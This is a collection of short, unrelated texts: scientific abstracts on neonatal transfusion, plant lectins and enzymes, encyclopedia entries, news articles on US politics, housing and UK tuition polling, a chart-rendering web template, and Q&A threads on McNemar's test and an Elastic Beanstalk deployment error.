Elevated cerebral fractional tissue oxygen extraction (cFTOE; ≥0.4) predicts early brain injury in very preterm infants. While blood transfusion increases oxygen-carrying capacity, its ability to improve cerebral oxygen kinetics in the immediate newborn period remains unknown. To investigate the effect of red blood cell (RBC) transfusion in the first 24 h of life on cFTOE in infants ≤29 weeks gestation. cFTOE was calculated from cerebral tissue oxygenation index (TOI) and cutaneous oximetry measured over a 30 min epoch before and after transfusion. Infants were dichotomised according to pre-transfusion cFTOE (low <0.4 vs high ≥0.4). 24 babies were included, 12 in each group. Pre- and post-transfusion Hb were similar between the groups. cFTOE significantly reduced after transfusion in the high but not low-extraction group (p<0.01). Early RBC transfusion favourably alters cerebral oxygen kinetics in infants with elevated cFTOE, showing potential for modification of the risk of hypoxic (brain) injury. |
Crevecoeur-sur-l'Escaut is a commune in the Nord department in northern France.
Communes in Nord |
@(chart: tools.FormattedChart)
@* placeholder for chart *@
<div id="@chart.id" class="chart @chart.format.cssClass"></div>
<script type="text/javascript">
function drawChart() {
var data = new google.visualization.DataTable(@{Html(chart.asJson.toString)})
var chart = new google.visualization.LineChart(document.getElementById('@chart.id'));
var options = {
title: '@chart.name',
colors: [@Html(chart.format.colours.map(c => s"'$c'").mkString(","))],
@if(chart.labels.size == 2){
legend: "none",
vAxis: {title: '@chart.labels(1)'},
} else {
legend: { position: "in" },
}
chartArea: { width: "90%" },
titleTextStyle: {color: '#999'},
axisTitlesPosition: 'in',
fontName : 'Arial',
smoothLine: true
};
}
google.charts.setOnLoadCallback(drawChart);
</script>
|
Havre ( ) is the county seat and largest city in Hill County, Montana, in the United States. Havre is nicknamed the crown jewel of the Hi-Line. It is said to be named after the city of Le Havre in France.
As of the 2010 census the population was 9,310, and in 2016 the estimated population was 9,846.
Havre was incorporated in 1893. It was founded mainly as a railroad service center for the Great Northern Railway.
A buffalo jump, named the Too Close for Comfort Site, is just outside of town. The Milk River is also nearby. |
In the brief window between the end of the government shutdown six weeks ago, and the news tsunami that drowned it out when the media realized how bad Healthcare.gov was, the conventional wisdom held that the GOP would resist the temptations of brinkmanship in the new year and extend funding for the government without any drama.
Part of the conventional wisdom was rooted in political math -- the shutdown was bad, there's no way they'd do it again, months closer to the midterms. Part of it was regression to the mean bias. Part of it was that Senate Minority Leader Mitch McConnell said so: “There’s no education in the second kick of a mule. The first kick of the mule was in 1995; the second one was the last 16 days. A government shutdown is off the table. We’re not going to do it … We’re not going to do this again in connection with the debt ceiling or with a government shutdown.”
Advertisement:
Then as Affordable Care Act woes mounted, the conventional wisdom hardened. Republicans weren't going to surrender the gift of the Obama administration's blundering rollout of the Affordable Care Act by shutting down the government.
All reasonable inferences. And now, the offices of Rep. Paul Ryan, R-Wis., and Sen. Patty Murray, D-Wash., are baiting reporters with the possibility that the two chairs of the House and Senate Budget Committees will reach an agreement to pay down a few years of sequestration with a mix of other modest spending cuts and non-tax revenues spread out over many years. All that would be left to do then is pass some appropriations before Jan. 15 and we'd be in the clear.
With all that out there, if I had to wager now, I'd put my money on the conventional wisdom.
Advertisement:
But I'd also want to find a safe hedge. And the reason, again, is the Affordable Care Act.
The relationship between the ACA rollout and the looming budget deadlines isn't quite as simple and static as it appeared in October.
Another shutdown would of course un-reverse the political reversal of fortune Republicans have enjoyed thanks to Obamacare, and that creates a huge incentive for Republican leaders to cut conservative hard-liners loose and strike a deal with Democrats on the budget. But a few things are pulling in the opposite direction.
Advertisement:
One is just the natural inclination of parties to overreach when they believe they have the upper hand. Republicans have already wiped tax revenues off the table, and conservatives aren't exactly wild about raising revenue through fees and sales either, if it means using the proceeds to increase spending. They're nevertheless pressing Democrats to agree to Medicaid cuts -- something Democrats have been reluctant to do under any circumstances, but particularly if the tax side of the ledger tallies zero.
If Murray and Ryan manage to reach an agreement, conservatives groups -- Heritage, Club for Growth and others -- will very likely savage it, and if past is prologue, rank-and-file Republicans will follow, and GOP leaders will have to decide once again whether escalating a shutdown fight would be preferable to breaking the Hastert Rule.
Advertisement:
If the deal falls through, Speaker John Boehner has posited that he'll place legislation to renew funding for the government at sequestration levels on the House floor, and finish out the fiscal year without a budget. But it's unclear if that bill could pass. House Republican military hawks are desperate to avoid this round of automatic cuts, because they primarily reduce defense spending. They'd have to be strong-armed into supporting a bill that allows those cuts to happen. Republicans might think battered Democrats would help them assemble a majority, but I believe they're mistaken.
"I'm not going to support a short-term CR [stopgap funding bill] that leads to a $967 [billion] … allocation," said Rep. Steny Hoyer, D-Md., who's the Dems' top vote counter.
The problem actually gets worse if Healthcare.gov continues to enroll tens of thousands of people a day. The next deadline for funding the government lands after benefits kick in, but before open enrollment ends. Conservative hard-liners might thus (finally) accept that they can't use budget deadlines to delay or defund the law, but they'll face a strong temptation to use this one to further discourage enrollment.
Advertisement:
And how eager will conservatives be to play nice on the budget if the Obamacare worm has turned, and the incentive of keeping the rollout disaster on the front page no longer exists. |
Jeu de paume was originally a French game similar to lawn tennis, but played without racquets. The players hit the ball with their hands as in volleyball. Jeu de paume literally means: game of palm (of the hand). After some time gloves replaced bare hands. But even when bats, and finally racquets, became standard equipment for the game, the name did not change. It became known as "tennis" in English (see History of tennis), and later "real tennis" after lawn tennis became more popular than the parent game.
Some important buildings in France are known by the name jeu de paume, in general because they are near to tennis courts or to sites on which courts once stood. Several works of art also bear this name, including the famous serment du jeu de paume ('the Tennis Court Oath') in the Palace of Versailles. It depicts the formal announcement of the French revolution made in the Royal Tennis Court there on 20 June, 1789.
Sports that developed from jeu de paume
American handball
Basque pelota
Fistball
Frisian handball
Gaelic handball
Longue paume
Pallone
Valencian pilota
Volleyball
Court tennis
Tennis |
Q:
Why does the McNemar's test use chi-square and not the normal distribution?
I just noticed how the non exact McNemar's test uses the chi square asymptotic distribution. But since the exact test (for the two case table) relies on the binomial distribution, how come it is not common to suggest the normal approximation to the binomial distribution?
Thanks.
A:
A close-to-intuitive answer:
Take a closer look at the formula for the McNemar test, given the table
pos | neg
----|-----|-----
pos | a | b
----|-----|-----
neg | c | d
The McNemar statistic M is calculated as:
$$ M = {(b-c)^2 \over b+c} $$
The definition of a $\chi^2$ distribution with k degrees of freedom is that it consists of the sum of squares of k independent standard normal variables. if the 4 numbers are large enough, b and c, and thus b-c and b+c can be approximated by a normal distribution. Given the formula for M, it's easily seen that with large enough values M will indeed follow approximately a $\chi^2$ distribution with 1 degree of freedom.
EDIT :
As onstop rightfully indicated, the normal approximation is in fact completely equivalent. That's rather trivial given the argument using the approximation of b-c by the normal distribution.
The exact binomial version is also equivalent to the sign test, in the sense that in this version the binomial distribution is used to compare b to $Binom(b+c,0.5)$. Or we can say that under the null hypothesis the distribution of b can be approximated by $N(0.5\times(b+c),0.5^2\times(b+c)$.
Or, equivalently:
$$\frac{b-(\frac{b+c}{2})}{\frac{\sqrt{b+c}}{2}}\sim N(0,1)$$
which simplifies to
$$ \frac{b-c}{\sqrt{b+c}}\sim N(0,1)$$
or, when taken the square on both sides, to $M \sim \chi^2_1$.
Hence, the normal approximation is used. It is the same as the $\chi^2$ approximation.
A:
Won't the two approaches come to the same thing? The relevant chi-square distribution has one degree of freedom so is simply the distribution of the square of a random variable with a standard normal distribution. I'd have to go through the algebra to check, which I haven't got time to do right now, but I'd be surprised if you don't end up with exactly the same answer both ways.
|
A typographical error or typo is a word that has been spelt wrong by accident. There are a few ways to make a typo:
Hitting the wrong key while typing. Example: "Tom amd Jane are friends."
Pressing the keys in the wrong order. Example: "Tom nad Jane are friends."
Forgetting to press a key. Example "Tom nd Jane are friends."
Holding a key too long, causing a letting to be typed twice. Example "Tom andd Jane are friends."
Typography |
BMG’s latest poll for the Independent reveals strong public opposition to the current tuition fee upper limit of over £9,000 per year. The poll finds that the current fees regime, which has stirred controversy since its inception under the Coalition government in 2012, is supported by just 18% of the British public.
Conducted between the 8 and 11 August, the survey of a representative sample of 1463 adults shows that almost two-third of people want tuition fees either reduced or removed altogether. 34% would support the introduction of a cap of £3,000 – close to the previous limit that was in place prior to the introduction of reforms in 2012 – and 31% stated that the Government should scrap fees entirely. 17% answered don’t know.
Interestingly, levels of educational attainment do not appear to have an impact on support, with the current fees regime unpopular in all educational groups. Just 18% with degree qualifications, 21% with non-degree qualifications and 9% with no qualifications (relatively high levels of don’t knows) said the Government should leave the current fees system in place. Whilst older people are more supportive of the current system than those than those in younger age groups, close to three in five over 55s still stated that annual tuition fees to be cut or scrapped.
Unsurprisingly, given the party’s pledge to scrap fees at the 2017 election, those intending to vote Labour were the most likely to support making university tuition free, with close to half (48%) backing their abolition. However, whilst just 11% of Conservative supporters backed free tuition, a plurality (39%) did state that fees should be reduced to £3,000.
The poll also found that over two in three voters (68%) would also scrap the interest on money borrowed to pay for fees, which is set to the Retail Price Index (RPI) level of inflation plus 3 per cent, which implies 6.1% from this autumn. Just 17% wanted to leave current interest rates in place, with 15% unsure.
Robert Struthers, Research Executive at BMG research said: “Our polling for the Independent shows that, at their current rate at least, tuition fees are almost universally unpopular, even among Conservative voters and those who have not gone to University, who you might expect to be more supportive of the current system.
“That being said, many appear to support imposing fees in principle but appear to view the current cap as excessive. It is also important to stress that it is unclear the extent to which the issue is salient in the minds of the public. For example, it is not obvious at which level people would prioritise reducing or scrapping tuition fees, when set against other spending priorities, or indeed whether they would be willing to pay more in tax to fund the reductions.”
Readers can interrogate the data themselves by toggling with the menu below.
An article based on these polling results, released by the Independent, can be found here.
Methodology, fieldwork dates, and a full breakdown of these results can be found here.
For a more detailed breakdown of results from this poll, or any other results from our polling series, please get in touch by email or phone.
[email protected]
@BMGResearch
0121 333 6006
Ciaran McGlone – Graduate Research Executive |
Bert Parks (born Bertram Jacobson; December 30, 1914 - February 2, 1992) was an American actor, singer, and radio and television announcer. He was best known for hosting the annual Miss America pageants from 1955 to 1979.
The first game show that Parks hosted was Party Line on NBC. Other games Parks hosted in early television included Stop the Music, Masquerade Party and the pilot for Hollywood Squares.
Parks was known for singing "There She Is, Miss America" to each new Miss America when he hosted the pageant.
Parks was born in Atlanta, Georgia to a Jewish family. He died from lung cancer near La Jolla, California at the age of seventy-seven. |
Q:
Elastic Beanstalk Deployment Errno 2 No Such File / Directory
It's my first time deploying something to AWS using Elastic Beanstalk and so far I've gotten to the point where I can run eb create and get started. The first time I did this I got Errno 13. Specifically, I got to the point where it tried to create the application and then:
Creating application version archive "app-150423_212419".
ERROR: IOError :: [Errno 13] Permission denied: './.viminfo'
I learned that this is a root access issue and so I followed a step found here that stated I should try the bash command:
sudo chown -R test /home/test
Here test = my user name and home = Users.
This got me to the error ERROR: OSError :: [Errno 2] No such file or directory: './.collab/ext'
I'm really not sure what that directory is supposed to be or why it's trying to access it. How can I choose a proper directory so that I can get things up and running?
A:
eb create will attempt to zip up your entire directory and deploy it to an elastic beanstalk environment. I am not sure why certain files seem to not exist(maybe you have some symlinks?).
It also looks as if you might be trying to run eb create in your home directory. Dont do that. In fact remove the .elasticbeanstalk folder from your home directory right now.
All you need to do is go into your project directory, run eb init, then eb create.
|
Sasha Grey (born Marina Ann Hantzis on March 14, 1988) is an American former pornographic actress, who now does ordinary acting, modelling, and music. She was born and raised in North Highlands, California. In 2005, she started taking acting, dancing and music lessons. After she turned 18, she started to participate in pornographic movies in Los Angeles. She is openly bisexual.
Grey has released two books. A photo book, Neu Sex, was released on March 29, 2011 by VICE books. On May 9, 2013 The Juliette Society, an erotic novel, was published by Sphere.
She has been in three music videos.
Filmography
Film
Series
Music videos
Video games |
Several plant lectins are known as potent immunomodulatory agents, and they are applied in different experimental models of infection (Afonso-Cardoso et al., [@B1]; Oliveira et al., [@B13]). Recent research has characterized these proteins as potential agonists of Toll-like receptors (TLRs or TLR), a family of mammalian homologs of *Drosophila* Toll protein involved in the detection of microbes and initiating inflammatory responses (O\'Neill et al., [@B14]). In this opinion article, we highlighted some studies of plant lectins as modulators or agonists of TLRs in order to stimulate research interest in this fascinating area and promote knowledge sharing and scientific collaboration.
A short view on plant lectins
=============================
Lectins are a very large class of carbohydrate-binding proteins of non-immune origin. Through the interaction with sugars, they trigger several important cellular processes. Lectins are universally expressed and have been shown to function in animals, plants, and microorganisms as cell and molecular recognition proteins. However, the carbohydrate-binding domains have been studied most intensively within the plant kingdom (Sharon, [@B16]; Vandenborre et al., [@B20]).
The discovery of plant lectins occurred in the 19th century, however, many questions about the biological role of these molecules remain obscure. Lectins may be involved in sugar transport, carbohydrate storage and they are associated as molecular chaperones (Van Damme et al., [@B18a]; Liu and Li, [@B10]). The adhesion and agglutination properties of lectins have been related in the interaction of both symbiotic and pathogenic interaction of some microorganisms and host (Audfray et al., [@B2]). Plant lectins represent a group of proteins with obvious differences in their biochemical/physicochemical properties, molecular structure, carbohydrate-binding specificity and biological activities (Liu et al., [@B9]). Lectins are oligomeric which exhibit a large structural diversity and the molecular size range from 60 to 400 kDa. Each lectin polypeptide contains many molecular domains, one of which is the non-catalytic carbohydrate recognition domain, responsible for their ability to recognize and interact with specific glycoconjugates, without altering their structure. In the past few years, hundreds of plant lectins have been purified and characterized in details with respect to their biochemical properties, carbohydrate-binding specificities, these approaches allowed their classification (Van Dammes et al., [@B19]).
Toll-like receptors
===================
Plant materials represent an excellent source of immune modulators, which have been appointed as a new approach for combating infections caused by resistant microorganisms (Hancock et al., [@B5]). In this sense, a range of potential compounds have been proposed as agonists or inductors of immune receptors, including TLRs.
The TLR family is the best characterized group of innate immune receptors in terms of known ligands, downstream signaling pathways and functional relevance. They comprise a family of receptors homologous to Toll receptor from Drosophila melanogaster. In humans, the TLR family includes 10 transmembrane proteins that play a crucial role in host defense: they recognize molecular characteristics of microorganisms, known as pathogen-associated molecular patterns (PAMPs) highly conserved between different classes of microorganisms. For example, TLR4 and accessory proteins recognize lipopolysaccharide (LPS), while TLR2 recognizes lipoteichoic acid and various lipopeptides (when in complex with either TLR-1 or TLR-6), and TLR5 recognizes flagellin (Hancock et al., [@B5]; O\'Neill et al., [@B14]). In this way, TLR receptors represent important therapeutic targets for developing new drugs able to directly modulate the host response against microbial infection. In fact, some TLR agonists and TLR modulators have been investigated as potential drugs on clinical trials and research programmes (Hennessy et al., [@B6]; Murgueitio et al., [@B12]).
Plant lectins and toll-like receptors
=====================================
Lectins have been extensively used as valuable tools in the biomedical research. The versatility of these biomolecules is due to their interactions with receptor-linked glycans on cell surfaces, which may trigger cell signaling and physiological responses (Lam and Ng, [@B7a]). Plant lectins are characterized as immunomodulator agent, which result in the production of certain cytokines and reactive species and induce efficient immune responses against tumors or microbial infections. A very comprehensive review of immunomodulatory lectins has recently been published by Souza et al. ([@B17a]). In order to investigate the mechanism of this action, some researchers correlated the activation of immune cells by lectins with the expression of TLR receptors.
Sodhi et al. ([@B17]) investigated the expression of different TLRs induced by the famous lectin from Concanavalin A (Con A) using mouse macrophages as a model. Con A enhanced *in vitro* expression of TLRs (2--9) and its action was related with JNK, p38, p42/44, and NF-κ B. The authors also showed the heterodimerization of TLR-2 and TLR-6. Additionally, Con A pre-treated-macrophages were more susceptible to induction of proinflammatory cytokines and nitric oxide by different TLR ligands (ZymosanA, PolyI:C, LPS, CpG DNA).
In other study, the Korean mistletoe lectin (KML-C) from *Viscum album coloratum* was shown to be a potent activator of TLR-4. The treatment of mouse peritoneal macrophages with KML-C-induced the upregulation of interleukin-1 receptor-associated kinase-1 (IRAK1) resulting in macrophage activation and TNF-α production, which was not observed when TLR-4 was blocked using a TLR-4-specific neutralizing antibody or TLR-4-deficient macrophages. The expression of TLR-4 was also induced by lectin-like protein from *Anoectochilus formosanus* (IPAF), resulting in the stimulation of TNF-α and IL-1β, CD86, and MHC II and phagocytic activity (Park et al., [@B15]).
The capacity to modulate the TLR were explored to combat the experimental infection of *Paracoccidiodes brasiliensis* using native and recombinant KM^+^, a mannose-binding lectin from *Artocarpus integrifolia*. BALB/c mice were infected with *P. brasiliensis* and after 10 days both proteins were separately administered. KM^+^ treatment reduced significantly colony-forming unit and induced higher levels of nitric oxide, INF-α, TNF-α, and IL-12, which was dependent on TLR-2 (Coltri et al., [@B4]).
Recently, in a remarkable paper, phytohaemagglutinin (PHA from *Phaseolus vulgaris*) and its isoforms were showed as a specific human TLR-4 agonist during an initial screening. This result encouraged the authors to examine the effects of this and other lectins on external (-2/6, -4, and -5) and internal (-3, -7, -8, and -9) human TLRs. In this research, SBA (Soybean agglutinin from *Glycine max*), PNA (peanut agglutinin from *Arachis hypogaea*), ConA and PHA only stimulated extracellular TLRs (-2/6, -4, or -5): TLR-4 for SBA and PNA; TLR-2/6 for ConA; TLR-2/6, -4 and for PHA-L. In other hand, WGA (wheat germ agglutinin from *Triticum vulgaris*) was the most promiscuous lectin activating all tested receptors, except TLR-3 and -4. The jacalin (from *Artocarpus integrifolia*) was inactive. This variety of TLR agonist pharmacology is related to different sugar ligand specificity of each plant lectins, suggesting that the action is encoded by the carbohydrate recognition motifs on different TLRs (Unitt and Hornigold, [@B18]). TLR agonists have been proposed as adjuvants for vaccines against virus (Behzad et al., [@B3]; Hong et al., [@B7]), bacteria (Hancock et al., [@B5]), parasite (Moon et al., [@B11]) and fungi (LeibundGut-Landmann et al., [@B8]).
In conclusion, these observations encourage further studies for the characterization of plant lectins as novel agonists and modulators of TLR receptors. These proteins act by increasing the immune response of the host against microbial infections, thus overcoming their immunosuppressive mechanisms and offers an alternative to combat the increasing drug resistance. These approaches may also provide new insights on TLR biology and aid in the discovery of new targets glycosides useful in therapy.
Conflict of interest statement
------------------------------
The Editor and Authors declare that while the authors and reviewer (Rafael E Silva) are affiliated with the same institution there has been no conflict of interest during the review and handling of this manuscript.
The authors express their gratitude to the Conselho Nacional de Desenvolvimento Científico e Tecnológico (CNPq), to the Coordenação de Aperfeiçoamento de Pessoal de Nível Superior (CAPES), and to the Fundação de Amparo à Ciência e Tecnologia do Estado de Pernambuco (FACEPE) for research Grants.
[^1]: This article was submitted to Antimicrobials, Resistance and Chemotherapy, a section of the journal Frontiers in Microbiology.
[^2]: Edited by: James Stach, University of Newcastle, UK
[^3]: Reviewed by: Paul D. Brown, University of the West Indies, Jamaica; Rafael De Freitas E. Silva, University of Pernambuco, Brazil
|
Goofball is the second extended play by English music producer and sound designer Eddie Jefferys, known as his stage name Moody Good. It was released by English record label Never Say Die on 15 March 2019. It has four songs, including a collaboration with Australian electronic music producer Hydraulix.
Track listing
Release history |
The latest numbers in housing aren't pretty at all. Sales of both existing and newly built homes fell in June, the latter to the lowest level since last year. Prices continue to rise, but the gains are slowing. Mortgage applications to purchase both new and existing homes have been falling steadily, and mortgage rates are rising again. Single-family home construction also fell and was lower than June 2017. In one of the nation's hottest metropolitan markets, Denver, Colorado, home sales fell 5.5 percent annually in June, even as prices hit an all-time high, according to a report by RE/MAX. Realtors there blame it squarely on a lack of homes for sale. "Year-over-year prices have been climbing for more than two years now, which is great news for homeowners and sellers," said RE/MAX CEO Adam Contos. "The slower sales figures we're seeing are tied to inventory more than anything else."
But the slowdown is also tied to overheated prices. Even in the hottest markets, there is a limit to affordability, and that limit is clearly now being hit. In pricey Southern California, sales of both new and existing homes fell sharply in June compared with a year ago, according to CoreLogic. Demand is still quite strong, and while prices continue to gain, more listings are showing price reductions. "The market is strong, but I'm seeing a noticeable difference in the number of buyers that are looking at my listings each week," said David Fogg, a real estate agent based in Burbank, California. "We're still selling most every home, but now it is usually with just one or two offers over the 10 to 15 offers we were seeing earlier in the year."
'Anything-goes list-price strategy'
Fogg said he is also working very closely with his sellers now to make better and more realistic decisions about pricing. "The anything-goes list-price strategy is no longer working. Buyers want to buy, but we're seeing fewer of them, and they are much more careful. Many properties are now not selling and/or coming down in price." In a twist, a sales slowdown and more seller sanity could now actually boost the very slow recovery in homeownership. It ticked slightly higher again in the second quarter of this year, according to the U.S. Census. "The rise in homeownership in the spring was consistent with the last few quarters, so while there appears to be a slowdown in the growth rate of home sales and prices, it has not slowed rising homeownership," said Sam Khater, chief economist at Freddie Mac. Homeownership is still well below the peak of the housing boom in 2005 and a full percentage point below the 50-year average. This is because the largest generation, millennials, was delayed financially. "This lag reflects the long-lasting scars from the Great Recession and the lopsided nature of this recovery. Despite years of continuous job growth and a slowly improving economy, it was only last year where we started to see an uptick in homeownership," added Khater. Millennials finally began entering the housing market in huge numbers last year, only to find a critical shortage of homes for sale and fast-rising home prices. Bidding wars became the norm, and young potential buyers from coast to coast were often priced out. "I thought I was at a higher price point where it would be a little bit easier for me to get a place without a lot of competition, but I've put down two offers so far and both times been beaten out by cash offers," said Brittany Storoz, a millennial who was house hunting in Denver, in an interview last winter. One of the homes she toured saw more than 100 people walk through it in just three days.
Millennials still buying
Homeownership is, however, gaining for younger households, especially those under 35. In the second quarter of this year, their homeownership rate hit the highest level in five years, according to the U.S. Census. This as homeownership fell for households aged 55 and older. "This suggests that younger buyers are finding success despite the fact that they are more likely to have to adjust their home search in response to rising prices and mortgage rates," said Danielle Hale, chief economist for Realtor.com. A recent survey by Realtor.com found 69 percent of recent closers ages 35-54 reported adjusting their home search in response to rising costs, while 77 percent of recent closers ages 18 to 34 reported the same. There is, however, a price limit, and that is part of why existing home sales have been falling for three straight months. The other part is a lack of affordable homes for sale. Sales of homes priced below $250,000 were sharply lower in June compared with a year ago, while those priced from $250,000-$750,000 were essentially flat, according to the National Association of Realtors. The inventory shortage is most critical at the lower end of the housing market for two reasons. First, homebuilders say they cannot afford to build lower-priced homes because of rising costs for labor and materials. Second, investors purchased millions of lower-end homes that went into foreclosure during the housing crisis and turned them into lucrative, single-family rentals. They continue to hold those homes or sell them to other investors.
WATCH: How to use your home as a source of cash |
Dr. Ivo "Eggman" Robotnik is the main antagonist of Sonic the Hedgehog. He first appeared in 1991 in the game Sonic the Hedgehog for Sega Mega Drive. He last appeared in 2022 in the game Sonic Frontiers.
Creation
In April 1990, Sega wanted a character to replace Alex Kidd as the company's mascot. One of the designs was a caricature of Theodore Roosevelt. This became the basis for the design of Dr. Eggman. They wanted a character that was the opposite of Sonic, a character that would represent technology and development. The character was also designed to be easily drawable by children.
Features
Eggman is a distinguished scientist and mechanical genius with an IQ of 300. He is an expert in the field of robotics. Despite all this, Eggman uses intelligence on purposes. He attempts to conquer the world and create his own utopia. Despite many setbacks, he never gives up and he does not care what others think of his actions. He considers anyone who opposes his plans is a serious threat. Despite his intellect, Eggman is often insane. Sometimes he can't even except the fact that he is in trouble. He also doesn't like snooping.
Fictional characters introduced in 1991
Sonic the Hedgehog characters
Video game antagonists
Video game bosses
Video game characters in movies
Fictional American people
Fictional characters by medium |
Take to the titan sky
In a surprise announcement at Paris Games Week, Oure was revealed and given an immediate release for PlayStation 4. Not much is known about it other than what we can see from the brief trailer but from what we've been told you are a child that lives in a world of Titans.
These titans for some reason or other have been knocked off of their routine. It is your duty to get these Titans back on track! You do it by flying around on a dragon and solving puzzles pertaining to each Titan. I got a lot of Journey vibes from it and anything that reminds me of that peaceful game is a good thing. It will be available as the hosts said "later today" so keep an eye on the PlayStation Store.
Click to open photo gallery: |
Sahabzada Yaqub Khan (23 December 1920 - 26 January 2016) was a high-profile Pakistani figure and high-ranking general. He was the most senior figure in military and government assignments in the Pakistan Government. He was born in Rampur, India.
He was an important figure in Pakistan that related to international affairs for thirty years. He served as the foreign minister under President General Zia-ul-Haq from 1982 to 1991 and as the caretaker foreign minister from 1996 to 1997. He also served as the Pakistan Ambassador of the United States serving from 1973 though 1979.
Khan died in Islamabad on 26 January 2016 at the age of 95. |
Fox News is opening its 5 p.m. debate to all the announced Republican candidates who fail to make the cut for the Aug. 6 prime-time event, removing a requirement that participants reach at least 1 percent in polling.
The change amounts to an insurance policy for candidates who were in danger of being disqualified from the vital first debate based on low polls – Carly Fiorina, former New York Gov. George Pataki and Sen. Lindsey Graham (R-S.C.).
Story Continued Below
The announcement by Michael Clemente, Fox News Executive Vice President, News, means that all 16 announced candidates will qualify for Cleveland — either the 5 p.m. undercard, or the 9 p.m. main event.
The 9 p.m. debate will include the 10 candidates with the highest average in national polls, as determined by Fox News. The 5 p.m. forum will now include all the rest.
The next three, who would currently be relegated to 5 p.m., are Ohio Gov. John Kasich, Rick Santorum and Louisiana Gov. Bobby Jindal. They are followed by Fiorina, Pataki and Graham.
All of the candidates have been getting extensive Fox airtime. Here’s a tally of the total combined Fox News Channel and Fox Business Network appearances — several for an hour — by each of the hopefuls since their official campaign launches:
“Due to the overwhelming interest in the FOX News Facebook Debate Event Night on August 6th and in a concerted effort to include and accommodate the now 16 Republican candidate field — the largest in modern political history — FOX News is expanding participation in the 5 PM/ET debate to all declared candidates whose names are consistently being offered to respondents in major national polls, as recognized by Fox News,” said Clemente in a statement.
“Although we are relaxing one component of our entry criteria – the requirement that candidates must score 1% or higher in an average of five most recent national polls – all other components of the criteria remain in effect for the 5 PM/ET debate. Participants must meet all U.S. Constitutional requirements; must announce and register a formal campaign for president; and must file all necessary paperwork with the Federal Election Commission (FEC), including financial disclosure.
“As for the 9 PM/ET debate, all components of the original criteria remain unchanged – including the requirement that participants must place in the top 10 of an average of the five most recent national polls, as recognized by FOX News, leading up to August 4th at 5PM/ET. Such polling must be conducted by major, nationally recognized organizations that use standard methodological techniques.
“Everyone included in these debates has a chance to be President of the United States and we look forward to showcasing all of the candidates in the first primary event of the 2016 election season.”
The 5 p.m. debate, which will last an hour, will be moderated by Bill Hemmer and Martha MacCallum. The 9 p.m. debate will run about 90 minutes (two hours with commercial breaks and introductions), and be moderated by Bret Baier, Megyn Kelly and Chris Wallace. |
The Military and Overseas Voter Empowerment Act is a United States law made in 2009. It made it easier for Americans who live outside the United States to vote in United States elections.
The law says that each state has to allow people to register to vote through the Internet. It says the states must send ballots to its voters at least 45 days before each election.
President Barack Obama signed the bill. Senator Charles Schumer sponsored it.
Other websites
United States Congress |
This work entails scaling a biophysical model of the neocortex using parallel NEURON \[[@B1]\] while running on a Blue Gene / P in virtual node mode. Previous scaling experiments have been done with the SPLIT simulator on the Blue Gene / L with a similar neocortical model \[[@B2]\]. We chose a biophysical model of medium complexity based on the Hodgkin-Huxley formalism because this provides the capability of exploring the effects of psychotropic drugs as well as the oscillatory effects of cortical microcircuits and globally correlated network activity. Neocortical simulations were performed to determine both strong (fixed network size, increasing cores) and weak (increasing network size, fixed load per core) scaling with two variations of a square necortical patch of hypercolumns and internal minicolumns. The first variation consists of minicolumns with 20 layer 2/3 pyramidal cells, 2 basket cells and 5 layer 4 pyramidal cells and has orthogonally stored memory patterns, encoded with long-range excitatory connections between individual minicolumns across hypercolumns. The second variation has an additional 2 regular spiking non-pyramidal interneurons per minicolumn and instead uses sparse, randomly overlapping memory patterns encoded with both excitatory and inhibitory long-range connections between hypercolumns. Simulations were performed with both single patches of increasing area and cascades of multiple patches with feed-forward and feed-backward projections.
Individual simulations consisted of stimulation and completion of a single memory pattern within 1 second of cortical activity. Preliminary results show near linear speedups of the computational part of the simulation, but degradation of file I/O performance as the number of cores increase. Since each core writes out spiking activity after the simulation, the performance decline may be due to the ratio of core to I/O nodes and the large number of output files. With this performance analysis, further work will include measuring and scaling memory storage capacity with the described second variation of the biophysical neocortical model.
{#F1}
|
Corned beef is a cut of beef that has been pickled or cured in brine. Corned beef is a common meat in deli sandwiches. Corned beef is eaten by people on Saint Patrick's Day with cabbage.
Beef |
Leukocyte margination during hemorrhagic shock correlates to preshock margination and is reduced by fucoidin.
Systemic and pulmonary circulation kinetics for 51Cr-erythrocytes and 111In-leukocytes were measured in rats during experimental hemorrhagic shock and normotension with or without pretreatment with the antirolling agent fucoidin. Leukocyte margination was expressed as transit factors (white blood cell transit time/red blood cell transit time) for polymorphonuclear and mononuclear cells. There was an increased pooling of leukocytes in the pulmonary and systemic vascular beds during shock with a maximum after 60 min when the transit factors had increased 2.90-3.72 times in the pulmonary vascular bed and 2.00-3.52 times in the systemic vascular bed for mononuclear and polymorphonuclear cells, respectively. High preshock pooling levels lead to a more pronounced increase in pooling during shock. Pretreatment with fucoidin significantly reduced the pooling increase in the systemic vascular bed. Granulocyte oxidative activity (nitro blue tetrazolium test) invariably increased during shock and was not affected by fucoidin. |
Bedford, Texas is a suburban city in northeast Tarrant County, Texas, in the "Mid-Cities" area between Dallas and Fort Worth.
Public schools in Bedford are part of the Hurst-Euless-Bedford Independent School District. |
Cloning and functional characterization of a complex endo-beta-1,3-glucanase from Paenibacillus sp.
A beta-1,3-glucanase gene, encoding a protein of 1,793 amino acids, was cloned from a strain of Paenibacillus sp. in this study. This large protein, designated as LamA, consists of many putative functional units, which include, from N to C terminus, a leader peptide, three repeats of the S-layer homologous module, a catalytic module of glycoside hydrolase family 16, four repeats of the carbohydrate-binding module of family CBM_4_9, and an analogue of coagulation factor Fa5/8C. Several truncated proteins, composed of the catalytic module with various organizations of the appended modules, were successfully expressed and characterized in this study. Data indicated that the catalytic module specifically hydrolyze beta-1,3- and beta-1,3-1,4-glucans. Also, laminaritriose was the major product upon endolytic hydrolysis of laminarin. The CBM repeats and Fa5/8C analogue substantially enhanced the hydrolyzing activity of the catalytic module, particularly toward insoluble complex substrates, suggesting their modulating functions in the enzymatic activity of LamA. Carbohydrate-binding assay confirmed the binding capabilities of the CBM repeats and Fa5/8C analogue to beta-1,3-, beta-1,3-1,4-, and even beta-1,4-glucans. These appended modules also enhanced the inhibition effect of the catalytic module on the growth of Candida albicans and Rhizoctonia solani. |
The 2011 Australian Open was a tennis tournament featuring six different competitions. It was part of the 2011 ATP World Tour, the 2011 WTA Tour, ITF Junior Tour and the NEC Tour. The tournament took place at Melbourne Park in Melbourne, Australia, from 17 January to 30 January. The event was the 99th edition of the Australian Open. It was also the first Grand Slam event of 2011. The tournament was played on hard courts. It was organised by the International Tennis Federation and Tennis Australia.
